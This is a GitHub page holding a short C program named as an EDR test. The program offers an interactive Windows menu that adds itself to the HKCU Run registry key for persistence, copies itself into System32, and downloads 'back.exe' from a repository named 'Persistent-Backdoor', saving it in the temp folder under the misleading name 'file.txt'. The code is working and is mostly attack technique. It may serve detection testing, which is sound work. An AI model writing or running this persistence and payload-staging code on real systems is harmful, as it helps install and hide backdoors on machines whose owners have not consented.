-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathedr_test _v3.c
71 lines (65 loc) · 2.2 KB
/
edr_test _v3.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "urlmon.lib")
#define REG_KEY "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
#define REG_NAME "MyScript"
void print_commands() {
printf("Possible commands:\n");
printf("boot - create registry key to run the script on startup\n");
printf("copy - copy the script to System32\n");
printf("download - download a file from a URL defined in the script\n");
}
void create_registry_key() {
HKEY hkey;
if (RegOpenKey(HKEY_CURRENT_USER, REG_KEY, &hkey) == ERROR_SUCCESS) {
char path[MAX_PATH];
GetModuleFileName(NULL, path, MAX_PATH);
RegSetValueEx(hkey, REG_NAME, 0, REG_SZ, (BYTE*)path, strlen(path) + 1);
RegCloseKey(hkey);
printf("Created registry key to run the script on startup.\n");
} else {
printf("Failed to create registry key.\n");
}
}
void copy_to_system32() {
char source_path[MAX_PATH];
char dest_path[MAX_PATH];
GetModuleFileName(NULL, source_path, MAX_PATH);
sprintf(dest_path, "C:\\Windows\\System32\\%s", strrchr(source_path, '\\') + 1);
if (CopyFile(source_path, dest_path, FALSE)) {
printf("Copied the script to System32.\n");
} else {
printf("Failed to copy the script to System32.\n");
}
}
void download_file() {
char url[] = "https://github.com/PolGs/Persistent-Backdoor/releases/download/0.12/back.exe";
char dest_path[MAX_PATH];
GetTempPath(MAX_PATH, dest_path);
strcat(dest_path, "file.txt");
if (URLDownloadToFile(NULL, url, dest_path, 0, NULL) == S_OK) {
printf("Downloaded a file from a URL.\n");
} else {
printf("Failed to download a file from a URL.\n");
}
}
int main() {
char input[256];
while (1) {
print_commands();
printf("Enter a command: ");
fgets(input, sizeof(input), stdin);
if (strcmp(input, "boot\n") == 0) {
create_registry_key();
} else if (strcmp(input, "copy\n") == 0) {
copy_to_system32();
} else if (strcmp(input, "download\n") == 0) {
download_file();
} else {
printf("Invalid command.\n");
}
}
return 0;
}